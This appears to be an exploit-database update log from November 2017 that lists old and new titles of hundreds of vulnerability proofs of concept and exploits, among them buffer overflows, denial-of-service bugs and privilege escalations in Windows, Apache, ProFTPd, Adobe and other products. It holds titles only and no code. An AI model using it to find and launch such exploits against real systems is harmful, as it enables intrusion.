DB: 2017-11-02
5 new exploits Microsoft Internet Explorer - DHTML Object Handling Vulnerabilities (MS05-020) Microsoft Internet Explorer - DHTML Object Handling (MS05-020) Stoney FTPd - Denial of Service (rxBot mods ftpd) Stoney FTPd - 'rxBot mods ftpd' Denial of Service Microsoft Windows Server 2000 - UPNP (getdevicelist) Memory Leak Denial of Service Microsoft Windows Server 2000 - UPNP 'getdevicelist' Memory Leak Denial of Service Winamp 5.21 - .Midi File Header Handling Buffer Overflow (PoC) Winamp 5.21 - '.Midi' File Header Handling Buffer Overflow (PoC) Apache (mod_rewrite) < 1.3.37/2.0.59/2.2.3 - Remote Overflow (PoC) Apache < 1.3.37/2.0.59/2.2.3 mod_rewrite - Remote Overflow (PoC) ProFTPd 1.3.0a - 'mod_ctrls support' Local Buffer Overflow (PoC) ProFTPd 1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (PoC) Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption Vulnerabilities Opera 9.10 - '.jpg' Image DHT Marker Heap Corruption ZOO - .ZOO File Decompression Infinite Loop Denial of Service (PoC) Versalsoft HTTP File Uploader - ActiveX 6.36 (AddFile) Remote Denial of Service ZOO - '.ZOO' Decompression Infinite Loop Denial of Service (PoC) Versalsoft HTTP File Uploader - ActiveX 6.36 AddFile Remote Denial of Service RhinoSoft Serv-U FTP Server 7.3 - Authenticated (stou con:1) Denial of Service RhinoSoft Serv-U FTP Server 7.3 - Authenticated 'stou con:1' Denial of Service CUPS 1.3.7 - Cross-Site Request Forgery (add rss subscription) Remote Crash CUPS 1.3.7 - Cross-Site Request Forgery (Add RSS Subscription) Remote Crash Microsoft Office - Communicator (SIP) Remote Denial of Service Microsoft Office - Communicator 'SIP' Remote Denial of Service Apple Safari - 'ARGUMENTS' Array Integer Overflow (PoC) (Heap Spray) Apple Safari - 'ARGUMENTS' Array Integer Overflow HeapSpray (PoC) Amaya Web Editor 11.0 - XML / HTML Parser Vulnerabilities Amaya Web Editor 11.0 - XML / HTML Parser VideoLAN VLC Media Player 0.9.8a - Web UI (input) Remote Denial of Service VideoLAN VLC Media Player 0.9.8a - Web UI 'input' Remote Denial of Service Real Helix DNA - RTSP / SETUP Request Handler Vulnerabilities Real Helix DNA - 'RTSP' / 'SETUP' Request Handler BugHunter HTTP Server 1.6.2 - 'httpsv.exe' (GET 404) Remote Denial of Service BugHunter HTTP Server 1.6.2 - 'httpsv.exe' GET 404 Remote Denial of Service Apple Safari 3.2.3 (Windows x86) - JavaScript (eval) Remote Denial of Service Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service httpdx 1.4 - HTTP Server (Host Header) Remote Format String Denial of Service httpdx 1.4 - HTTP Server Host Header Remote Format String Denial of Service Multiple Media Player - HTTP DataHandler Overflow (iTunes & QuickTime etc) Multiple Media Players ((iTunes / QuickTime) - HTTP DataHandler Overflow Microsoft Internet Explorer 6/7/8 - Denial of Service (Shockwave Flash Object) Microsoft Internet Explorer 6/7/8 - Shockwave Flash Object Denial of Service Adobe (Multiple Products) - XML External Entity / XML Injection Vulnerabilities Adobe (Multiple Products) - XML External Entity / XML Injection PHP (Multiple Functions) - Local Denial of Service Vulnerabilities PHP (Multiple Functions) - Local Denial of Service RPM Select/Elite 5.0 - '.xml config parsing' Unicode Buffer Overflow (PoC) RPM Select/Elite 5.0 - '.xml Configuration parsing' Unicode Buffer Overflow (PoC) Microsoft Windows - SMB2 Negotiate Protocol (0x72) Response Denial of Service Microsoft Windows - SMB2 Negotiate Protocol '0x72' Response Denial of Service Oreans Themida 2.1.8.0 - TMD File Handling Buffer Overflow Oreans Themida 2.1.8.0 - '.TMD' File Handling Buffer Overflow Play [EX] 2.1 - Playlist File (M3U/PLS/LST) Denial of Service Play [EX] 2.1 - '.M3U'/'.PLS'/'.LST' Playlist File Denial of Service Apple iTunes 10.6.1.7 - '.m3u' Playlist File Walking Heap Buffer Overflow Apple iTunes 10.6.1.7 - '.m3u' Walking Heap Buffer Overflow Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service (Possible Buffer Overflow) Ipswitch IMail 5.0.5/5.0.6/5.0.7 - POP3 Denial of Service / Buffer Overflow RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Vulnerabilities RedHat Linux 6.x - X Font Server Denial of Service / Buffer Overflow Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4_ UoW imap 4.5 popd - Lock File Denial of Service Qualcomm qpopper 2.53/3.0 / RedHat imap 4.5 -4 / UoW imap 4.5 popd - Lock File Denial of Service Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (1) Axent NetProwler 3.0 - Malformed IP Packets Denial of Service (2) Axent NetProwler 3.0 - IP Packets Denial of Service (1) Axent NetProwler 3.0 - IP Packets Denial of Service (2) WFTPD 2.4.1RC11 - REST Command Malformed File Write Denial of Service WFTPD 2.4.1RC11 - 'REST' Malformed File Write Denial of Service id Software Quake 3 Arena Server 1.29 - Possible Buffer Overflow id Software Quake 3 Arena Server 1.29 - Buffer Overflow BSDI 3.0/3.1 - Possible Local Kernel Denial of Service BSDI 3.0/3.1 - Local Kernel Denial of Service Cisco IOS 11/12 - Malformed SNMP Message Denial of Service Cisco IOS 11/12 - SNMP Message Denial of Service Apache 1.3.x + Tomcat 4.0.x/4.1.x (Mod_JK) - Chunked Encoding Denial of Service Apache 1.3.x + Tomcat 4.0.x/4.1.x mod_jk - Chunked Encoding Denial of Service BitchX 1.0 - Malformed RPL_NAMREPLY Denial of Service BitchX 1.0 - 'RPL_NAMREPLY' Denial of Service RealPlayer 15.0.6.14(.3g2) - WriteAV Crash (PoC) RealPlayer 15.0.6.14(.3g2) - 'WriteAV' Crash (PoC) Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow Vulnerabilities Plug And Play Web Server 1.0 002c - FTP Service Command Handler Buffer Overflow ProFTPd 1.2.7/1.2.8 - ASCII File Transfer Buffer Overrun ProFTPd 1.2.7/1.2.8 - '.ASCII' File Transfer Buffer Overrun Avaya Argent Office - Malformed DNS Packet Denial of Service Avaya Argent Office - DNS Packet Denial of Service Cisco IOS 12 MSFC2 - Malformed Layer 2 Frame Denial of Service Cisco IOS 12 MSFC2 - Layer 2 Frame Denial of Service ClamAV Daemon 0.65 - Malformed UUEncoded Message Denial of Service Red-M Red-Alert 3.1 - Remote Vulnerabilities ClamAV Daemon 0.65 - UUEncoded Message Denial of Service Red-M Red-Alert 3.1 - Remote Exploit Neon WebDAV Client Library 0.2x - Format String Vulnerabilities Neon WebDAV Client Library 0.2x - Format String Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.6.x - Local Denial of Service / Memory Disclosure Adobe Acrobat / Acrobat Reader 6.0 - ETD File Parser Format String Adobe Acrobat / Acrobat Reader 6.0 - '.ETD' File Parser Format String Check Point VPN-1 SecureClient - Malformed IP Address Local Memory Access Check Point VPN-1 SecureClient - IP Address Local Memory Access CenterICQ 4.20/4.5 - Malformed Packet Handling Remote Denial of Service CenterICQ 4.20/4.5 - Packet Handling Remote Denial of Service Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption Vulnerabilities (MS06-012) Microsoft Excel 95/97/2000/2002/2003/2004 - Unspecified Memory Corruption (MS06-012) Mozilla (Multiple Products) - iFrame JavaScript Execution Vulnerabilities Mozilla (Multiple Products) - iFrame JavaScript Execution Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Vulnerabilities Microsoft .NET Framework SDK 1.0/1.1 - MSIL Tools Buffer Overflow Apple Mac OSX 10.x - LZWDecodeVector (.tiff) Overflow Apple Mac OSX 10.x - LZWDecodeVector '.tiff' Overflow SolarWinds Server and Application Monitor - ActiveX (Pepco32c) Buffer Overflow SolarWinds Server and Application Monitor - ActiveX 'Pepco32c' Buffer Overflow Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Vulnerabilities Computer Associates BrightStor ARCserve Backup 11.5 - mediasvr caloggerd Denial of Service Microsoft Windows XP - GDI+ ICO File Remote Denial of Service Microsoft Windows XP - GDI+ '.ICO' File Remote Denial of Service PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow Vulnerabilities PHP 5.2.1 'GD' Extension - '.WBMP' File Integer Overflow PC SOFT WinDEV 11 - WDP File Parsing Stack Buffer Overflow PC SOFT WinDEV 11 - '.WDP' File Parsing Stack Buffer Overflow Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service Vulnerabilities Microsoft Forms 2.0 - ActiveX Control 2.0 Memory Access Violation Denial of Service libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Vulnerabilities libcdio 0.7x - GNU Compact Disc Input and Control Library Buffer Overflow Multiple Platform IPv6 Address Publication - Denial of Service Vulnerabilities Multiple Platform IPv6 Address Publication - Denial of Service Ruby 1.9 - WEBrick::HTTP::DefaultFileHandler Crafted HTTP Request Denial of Service Ruby 1.9 - 'WEBrick::HTTP::DefaultFileHandler' Crafted HTTP Request Denial of Service Apple Safari For Windows 3.2.1 - Malformed URI Remote Denial of Service Apple Safari For Windows 3.2.1 - URI Remote Denial of Service Apple Safari 4 - Malformed 'feeds:' URI Null Pointer Dereference Remote Denial of Service Apple Safari 4 - 'feeds:' URI Null Pointer Dereference Remote Denial of Service Microsoft Windows Media Player 11 - .AVI File Colorspace Conversion Remote Memory Corruption Microsoft Windows Media Player 11 - '.AVI' File Colorspace Conversion Remote Memory Corruption Apache 2.4.7 (mod_status) - Scoreboard Handling Race Condition Apache 2.4.7 mod_status - Scoreboard Handling Race Condition Battlefield 2/2142 - Malformed Packet Null Pointer Dereference Remote Denial of Service Battlefield 2/2142 - Packet Null Pointer Dereference Remote Denial of Service Foxit Products GIF Conversion - Memory Corruption (LZWMinimumCodeSize) Foxit Products GIF Conversion - Memory Corruption (DataSubBlock) Foxit Products GIF Conversion - 'LZWMinimumCodeSize' Memory Corruption Foxit Products GIF Conversion - 'DataSubBlock' Memory Corruption Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption Vulnerabilities (LZWMinimumCodeSize) Paintshop Pro X7 - '.gif' Conversion Heap Memory Corruption 'LZWMinimumCodeSize' Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated TTF File Embedded in SWF Adobe Flash - Out-of-Bounds Memory Read While Parsing a Mutated '.TTF' File Embedded in SWF Adobe Flash - Heap Based Buffer Overflow Loading FLV File with Nellymoser Audio Codec Adobe Flash - Heap Based Buffer Overflow Loading '.FLV' File with Nellymoser Audio Codec PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Vulnerabilities PHP 5.4/5.5/5.6 - 'Unserialize()' Use-After-Free Wireshark - file_read (wtap_read_bytes_or_eof/mp2t_find_next_pcr) Stack Based Buffer Overflow Wireshark - memcpy (get_value / dissect_btatt) SIGSEGV Wireshark - file_read 'wtap_read_bytes_or_eof/mp2t_find_next_pcr' Stack Based Buffer Overflow Wireshark - memcpy 'get_value / dissect_btatt' SIGSEGV Wireshark - addresses_equal (dissect_rsvp_common) Use-After-Free Wireshark - addresses_equal 'dissect_rsvp_common' Use-After-Free pdfium - opj_jp2_apply_pclr (libopenjpeg) Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc (libopenjpeg) Heap Based Out-of-Bounds Read Wireshark - iseries_check_file_type Stack Based Out-of-Bounds Read pdfium - opj_jp2_apply_pclr 'libopenjpeg' Heap Based Out-of-Bounds Read pdfium - opj_j2k_read_mcc 'libopenjpeg' Heap Based Out-of-Bounds Read Wireshark - 'iseries_check_file_type' Stack Based Out-of-Bounds Read Wireshark - nettrace_3gpp_32_423_file_open Stack Based Out-of-Bounds Read Wireshark - 'nettrace_3gpp_32_423_file_open' Stack Based Out-of-Bounds Read pdfium - opj_t2_read_packet_header (libopenjpeg) Heap Use-After-Free pdfium - opj_t2_read_packet_header 'libopenjpeg' Heap Use-After-Free Samsung Galaxy S6 - android.media.process Face Recognition Memory Corruption (MdConvertLine) Samsung Galaxy S6 - 'android.media.process' 'MdConvertLine' Face Recognition Memory Corruption Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor (treo_attach) Nullpointer Dereference Linux Kernel 3.10.0 (CentOS / RHEL 7.1) - visor 'treo_attach' Nullpointer Dereference Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow Netwrix Auditor 7.1.322.0 - ActiveX 'sourceFile' Stack Buffer Overflow Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 1 Apple QuickTime < 7.7.79.80.95 - FPX File Parsing Memory Corruption 2 Apple QuickTime < 7.7.79.80.95 - PSD File Parsing Memory Corruption Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (1) Apple QuickTime < 7.7.79.80.95 - '.FPX' Parsing Memory Corruption (2) Apple QuickTime < 7.7.79.80.95 - '.PSD' Parsing Memory Corruption Adobe Flash - Heap Overflow in ATF Processing (Image Reading) Adobe Flash - Heap Overflow in ATF Processing Image Reading Apache 2.4.23 (mod_http2) - Denial of Service Apache 2.4.23 mod_http2 - Denial of Service Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table (win32k!bGeneratePath) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table (win32k!fsc_CalcGrayRow) Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Reads/Writes with Malformed 'fpgm' table 'win32k!bGeneratePath' Microsoft Windows Kernel - 'win32k.sys' '.TTF' Font Processing Out-of-Bounds Read with Malformed 'glyf' Table 'win32k!fsc_CalcGrayRow' WhatsApp 2.17.52 - Memory Corruption ICQ Pro 2003a - Password Bypass Exploit (ca1-icq.asm) ICQ Pro 2003a - 'ca1-icq.asm' Password Bypass Exploit IBM DB2 - Universal Database 7.2 (db2licm) Local Exploit IBM DB2 - Universal Database 7.2 'db2licm' Local Exploit SuSE Linux 9.0 - YaST config Skribt Local Exploit SuSE Linux 9.0 - YaST Configuration Skribt Local Exploit Solaris locale - Format Strings (noexec stack) Exploit Solaris locale - Format Strings 'noexec stack' Exploit UUCP Exploit - File Creation/Overwriting (Symlinks) Exploit UUCP Exploit - File Creation/Overwriting Symlinks Exploit GnomeHack - Local Buffer Overflow (gid=games) Kwintv - Local Buffer Overflow (gid=video(33)) GnomeHack - Local Buffer Overflow Kwintv - Local Buffer Overflow RedHat 6.1 man - Local Exploit (egid 15) RedHat 6.1 man - 'egid 15' Local Exploit Solaris 2.5.1 lp / lpsched - Symlink Vulnerabilities Solaris 2.5.1 lp / lpsched - Symlink Exploit SGI IRIX - Multiple Buffer Overflows (LsD) SGI IRIX - 'LsD' Multiple Buffer Overflows Solaris 5.5.1 X11R6.3 - xterm (-xrm) Privilege Escalation Solaris 5.5.1 X11R6.3 - xterm '-xrm' Privilege Escalation ProFTPd - 'ftpdctl pr_ctrls_connect' Exploit ProFTPd - 'ftpdctl' 'pr_ctrls_connect' Exploit GlobalScape - CuteFTP macros (.mcr) Local GlobalScape - CuteFTP macros '.mcr' Local socat 1.4.0.2 - Local Format String (not setuid) Socat 1.4.0.2 - Not SETUID Local Format String TipxD 1.1.1 - Local Format String (not setuid) TipxD 1.1.1 - Not SETUID Local Format String GNU a2ps - 'Anything to PostScript' Local Exploit (Not SUID) VisualBoyAdvanced 1.7.x - Local Shell Exploit (non suid) GNU a2ps - 'Anything to PostScript' Not SUID Local Exploit VisualBoyAdvanced 1.7.x - Non SUID Local Shell Exploit eXeem 0.21 - Local Password Disclosure (asm) eXeem 0.21 - Local Password Disclosure (ASM) Microsoft Excel 2000/2003 - Hlink Local Buffer Overflow (French) Microsoft Excel 2003 - Hlink Local Buffer Overflow (Italian) WinRAR 3.60 Beta 6 - SFX Path Local Stack Overflow (French) Microsoft Excel 2000/2003 (French) - Hlink Local Buffer Overflow Microsoft Excel 2003 (Italian) - Hlink Local Buffer Overflow WinRAR 3.60 Beta 6 (French) - SFX Path Local Stack Overflow Microsoft PowerPoint 2003 SP2 - Local Code Execution (French) Microsoft PowerPoint 2003 SP2 (French) - Local Code Execution Xcode OpenBase 9.1.5 (OSX) - Privilege Escalation (Root File Create) Xcode OpenBase 9.1.5 (OSX) - Root File Create Privilege Escalation Apple Mac OSX 10.4.8 - DiskManagement BOM (cron) Privilege Escalation Apple Mac OSX 10.4.8 - DiskManagement BOM 'cron' Privilege Escalation ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls support' Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (1) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' 'support' Local Buffer Overflow (2) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' Local Overflow (exec-shield) ProFTPd 1.3.0/1.3.0a - 'mod_ctrls' exec-shield Local Overflow Send ICMP Nasty Garbage (sing) - Append File Logrotate Exploit Send ICMP Nasty Garbage (SING) - Append File Logrotate Exploit Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (change sys Password) Oracle 10g R1 - xdb.xdb_pitrig_pkg PLSQL Injection (Change Sys Password) VUPlayer 2.49 - '.asx' (HREF) Universal Buffer Overflow VUPlayer 2.49 - '.asx' 'HREF' Universal Buffer Overflow VUPlayer 2.49 - '.asx' (Universal) Local Buffer Overflow VUPlayer 2.49 - '.asx' Universal Local Buffer Overflow Zinf Audio Player 2.2.1 - '.pls' Local Buffer Overflow (Universal) Zinf Audio Player 2.2.1 - '.pls' Universal Local Buffer Overflow Foxit Reader 3.0 (Build 1301) - PDF Buffer Overflow (Universal) Rosoft Media Player 4.2.1 - Local Buffer Overflow (multi target) Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow Rosoft Media Player 4.2.1 - Local Buffer Overflow Adobe Acrobat Reader - JBIG2 Universal Exploit (Bind Shell Port 5500) Adobe Acrobat Reader - JBIG2 Universal Exploit Mini-stream Ripper 3.0.1.1 - '.asx' (HREF) Local Buffer Overflow Mini-stream Ripper 3.0.1.1 - '.asx' 'HREF' Local Buffer Overflow Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (update) Millenium MP3 Studio 1.0 - '.mpf' Local Stack Overflow (2) BSD (Multiple Distributions) - 'setusercontext()' Vulnerabilities BSD (Multiple Distributions) - 'setusercontext()' Exploit Audacity 1.2 - '.gro' Universal Buffer Overflow (egg hunter) Audacity 1.2 - '.gro' Universal Buffer Overflow (Egghunter) NetAccess IP3 - Authenticated (ping option) Command Injection NetAccess IP3 - Authenticated Ping Option Command Injection Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript (.eps) Buffer Overflow Adobe Illustrator CS4 14.0.0 - Encapsulated Postscript '.eps' Buffer Overflow Jasc Paint Shop Pro 8 - Local Buffer Overflow (Universal) Jasc Paint Shop Pro 8 - Local Universal Buffer Overflow HTML Help Workshop 4.74 - hhp Buffer Overflow (Universal) HTML Help Workshop 4.74 - hhp Universal Buffer Overflow Audiotran 1.4.1 - Buffer Overflow (Direct RET) Audiotran 1.4.1 - Direct RET Buffer Overflow Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - User Mode to Ring Escalation (KiTrap0D) (MS10-015) Microsoft Windows NT/2000/2003/2008/XP/Vista/7 - 'KiTrap0D' User Mode to Ring Escalation (MS10-015) feedDemon 3.1.0.9 - opml File Buffer Overflow feedDemon 3.1.0.9 - '.opml' File Buffer Overflow Winamp 5.572 - Local Buffer Overflow (EIP + SEH DEP Bypass) Winamp 5.572 - Local Buffer Overflow (EIP + SEH) (DEP Bypass) GSM SIM Utility 5.15 - sms file Local Buffer Overflow (SEH) GSM SIM Utility 5.15 - '.sms' File Local Buffer Overflow (SEH) GSM SIM Utility 5.15 - Local Exploit (Direct RET) GSM SIM Utility 5.15 - Direct RET Local Exploit Microsoft Windows - Automatic LNK Shortcut File Code Execution Microsoft Windows - Automatic .LNK Shortcut File Code Execution QQPlayer 2.3.696.400p1 - smi File Buffer Overflow QQPlayer 2.3.696.400p1 - '.smi' File Buffer Overflow Microsoft Excel - Malformed FEATHEADER Record Exploit (MS09-067) Microsoft Excel - FEATHEADER Record Exploit (MS09-067) SnackAmp 3.1.3B - SMP Buffer Overflow (SEH DEP Bypass) SnackAmp 3.1.3B - SMP Buffer Overflow (SEH) (DEP Bypass) MP3-Nator - Buffer Overflow (SEH DEP Bypass) MP3-Nator - Buffer Overflow (SEH) (DEP Bypass) VisiWave - VWR File Parsing Trusted Pointer (Metasploit) VisiWave - '.VWR' File Parsing Trusted Pointer (Metasploit) F-Secure (Multiple Products) - ActiveX Overwrite (SEH) (Heap Spray) F-Secure (Multiple Products) - ActiveX HeapSpray Overwrite (SEH) Blade API Monitor - Unicode Bypass (Serial Number) Buffer Overflow Blade API Monitor - Unicode Bypass Serial Number Buffer Overflow SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - NETLS_LICENSE_FILE Exploit SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - LICENSEMGR_FILE_ROOT Exploit SGI IRIX 5.3/6.2 & SGI license_oeo 1.0 LicenseManager - 'NETLS_LICENSE_FILE' Exploit SGI IRIX 6.4 & SGI license_oeo 3.0/3.1/3.1.1 LicenseManager - 'LICENSEMGR_FILE_ROOT' Exploit Slackware Linux 3.4 - liloconfig-color Temporary file Slackware Linux 3.4 - makebootdisk Temporary file Slackware Linux 3.4 - 'liloconfig-color' Temporary file Slackware Linux 3.4 - 'makebootdisk' Temporary file Slackware Linux 3.4 - netconfig Temporary file Slackware Linux 3.4 - pkgtool Temporary file Slackware Linux 3.4 - 'netconfig' Temporary file Slackware Linux 3.4 - 'pkgtool' Temporary file IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation Vulnerabilities IBM AIX eNetwork Firewall 3.2/3.3 - Insecure Temporary File Creation IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation Vulnerabilities IBM AIX 4.2.1 portmir - Buffer Overflow / Insecure Temporary File Creation GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Vulnerabilities GNU groff 1.11 a / HP-UX 10.0/11.0 / SGI IRIX 6.5.3 - Malicious Manpage Quinn - 'the Eskimo' and Peter N. Lewis Internet Config 1.0/2.0 Weak Password Encryption Quinn - 'the Eskimo' and Peter N. Lewis Internet Configuration 1.0/2.0 Weak Password Encryption MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch and RDS Fix - Registry Key Vulnerabilities MDAC 2.1.2.4202.3 / Microsoft Windows NT 4.0/SP1-6 JET/ODBC Patch / RDS Fix - Registry Key Standard & Poors ComStock 4.2.4 - Machine Vulnerabilities Standard & Poors ComStock 4.2.4 - Exploit HP-UX 10.20/11.0 - SNMPD File Permission Vulnerabilities HP-UX 10.20/11.0 - '.SNMPD' File Permission CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) (Large Shellcode) CoolPlayer+ Portable 2.19.2 - Buffer Overflow (ASLR Bypass) Samba 2.0.x - Insecure TMP file Symbolic Link Samba 2.0.x - Insecure TMP File Symbolic Link SuSE 7.0 - KFM Insecure TMP File Creation SuSE 7.0 - KFM Insecure '.TMP' File Creation QNX RTOS 4.25 - CRTTrap File Disclosure QNX RTOS 4.25 - 'CRTTrap' File Disclosure Linux Kernel 2.4 - SUID execve() System Call Race Condition Executable File Read (PoC) Linux Kernel 2.4 - SUID 'execve()' System Call Race Condition Executable File Read (PoC) BlazeVideo HDTV Player 6.6 Professional - Exploit (Direct RETN) Aviosoft Digital TV Player Professional 1.x - '.PLF' Exploit (Direct Retn) BlazeVideo HDTV Player 6.6 Professional - Direct RETN Exploit Aviosoft Digital TV Player Professional 1.x - '.PLF' Direct Retn Exploit BlazeDVD 6.1 - '.PLF' File Exploit (DEP + ASLR Bypass) (Metasploit) BlazeDVD 6.1 - '.PLF' File Exploit (ASLR + DEP Bypass) (Metasploit) Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (1) Cscope 13.0/15.x - Insecure Temporary File Creation Vulnerabilities (2) Cscope 13.0/15.x - Insecure Temporary File Creation (1) Cscope 13.0/15.x - Insecure Temporary File Creation (2) Sony Playstation 3 (PS3) 4.31 - Save Game Preview SFO File Handling Local Command Execution Sony Playstation 3 (PS3) 4.31 - Save Game Preview '.SFO' File Handling Local Command Execution Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - Local Ring Exploit (EPATHOBJ) Microsoft Windows NT/2000/2003/2008/XP/Vista/7/8 - 'EPATHOBJ' Local Ring Exploit PHP 5.0.5 - Safedir Restriction Bypass Vulnerabilities PHP 5.0.5 - Safedir Restriction Bypass AudioCoder 0.8.22 - '.m3u' Buffer Overflow (Direct Retn) AudioCoder 0.8.22 - '.m3u' Direct Retn Buffer Overflow AudioCoder 0.8.22 - '.lst' Buffer Overflow (Direct Retn) AudioCoder 0.8.22 - '.lst' Direct Retn Buffer Overflow KingView 6.53 - ActiveX Remote File Creation / Overwrite (KChartXY) KingView 6.53 - 'KChartXY' ActiveX Remote File Creation / Overwrite BlazeDVD Pro Player 6.1 - Stack Based Buffer Overflow (Direct RET) BlazeDVD Pro Player 6.1 - Stack Based Direct RET Buffer Overflow Linux Kernel 2.4.x/2.5.x/2.6.x - Sockaddr_In.Sin_Zero Kernel Memory Disclosure Vulnerabilities Linux Kernel 2.4.x/2.5.x/2.6.x - 'Sockaddr_In.Sin_Zero' Kernel Memory Disclosure KingView 6.53 - Insecure ActiveX Control (SuperGrid) KingView 6.53 - 'SuperGrid' Insecure ActiveX Control Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass with ROP) Steinberg MyMp3PRO 5.0 - Buffer Overflow (SEH) (DEP Bypass + ROP) BlazeDVD Pro Player 7.0 - '.plf' Stack Based Buffer Overflow (Direct RET) BlazeDVD Pro Player 7.0 - '.plf' Stack Based Direct RETBuffer Overflow Filemaker Pro 13.03 / Advanced 12.04 - Login Bypass / Privilege Escalation Filemaker Pro 13.03 / Advanced 12.04 - Authentication Bypass / Privilege Escalation Microsoft Windows Task Scheduler - DeleteExpiredTaskAfter File Deletion Privilege Escalation Microsoft Windows Task Scheduler - 'DeleteExpiredTaskAfter' File Deletion Privilege Escalation Linux 3.17 - noexec File Security Bypass (Python ctypes and memfd_create) Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass FireEye - Malware Input Processor (uid=mip) Privilege Escalation FireEye - Malware Input Processor Privilege Escalation Microsoft Windows 8.1 (x64) - RGNOBJ Integer Overflow (MS16-098) Microsoft Windows 8.1 (x64) - 'RGNOBJ' Integer Overflow (MS16-098) VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Config Host Root Privilege Escalation VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation Easy MPEG/AVI/DIVX/WMV/RM to DVD - 'Enter User Name' Buffer Overflow (SEH) Microsoft Windows XP/2000 - RPC Remote (Non Exec Memory) Exploit Microsoft Windows XP/2000 - RPC Remote Non Exec Memory Exploit ProFTPd 1.2.10 - Remote Users Enumeration Exploit ProFTPd 1.2.10 - Remote Users Enumeration Multiple Browsers - Tabbed Browsing Vulnerabilities Multiple Browsers - Tabbed Browsing Ability Server 2.34 - FTP STOR Buffer Overflow (Unix Exploit) Ability Server 2.34 (Unix) - FTP 'STOR' Buffer Overflow Webmin 1.5 - Web Brute Force (cgi-version) Webmin 1.5 - Web Brute Force (CGI) Microsoft Windows Plug-and-Play Service - Remote Universal Exploit (French) (MS05-039) Battlefield (BFCC/BFVCC/BF2CC) - Login Bypass/Pass Stealer/Denial of Service Microsoft Windows Plug-and-Play Service (French) - Remote Universal Exploit (MS05-039) Battlefield (BFCC < 1.22_A /BFVCC < 2.14_B / BF2CC) - Authentication Bypass / Password Stealer / Denial of Service Lynx 2.8.6dev.13 - Remote Buffer Overflow (port bind) Lynx 2.8.6dev.13 - Remote Buffer Overflow Mercury Mail Transport System 4.01b - Remote Exploit (PH SERVER) Mercury Mail Transport System 4.01b - PH SERVER Remote Exploit SHOUTcast 1.9.4 - File Request Format String (Leaked) SHOUTcast 1.9.4 - File Request 'Leaked' Format String Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (extra) Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution MySQL 4.x/5.0 (Windows) - User-Defined Function (UDF) Command Execution MySQL 4.x/5.0 (Windows) - User-Defined Function Command Execution GNU Mailutils imap4d 0.6 - Remote Format String (exec-shield) GNU Mailutils imap4d 0.6 - exec-shield Remote Format String Fenice Oms server 1.10 - Remote Buffer Overflow (exec-shield) Fenice Oms server 1.10 - exec-shield Remote Buffer Overflow HP Tru64 - Remote Secure Shell User Enumeration Exploit HP Tru64 - Remote Secure Shell User Enumeration Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow 2 Yahoo! Messenger Webcam 8.1 - ActiveX Remote Buffer Overflow (2) Program Checker - 'sasatl.dll 1.5.0.531' JavaScript Heap Spraying Exploit Program Checker - 'sasatl.dll 1.5.0.531' JavaScript HeapSpray Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog Heap Spraying Exploit Program Checker - 'sasatl.dll 1.5.0.531' DebugMsgLog HeapSpray Data Dynamics ActiveBar - ActiveX (actbar3.ocx 3.1) Insecure Methods Data Dynamics ActiveBar - ActiveX 'actbar3.ocx 3.1' Insecure 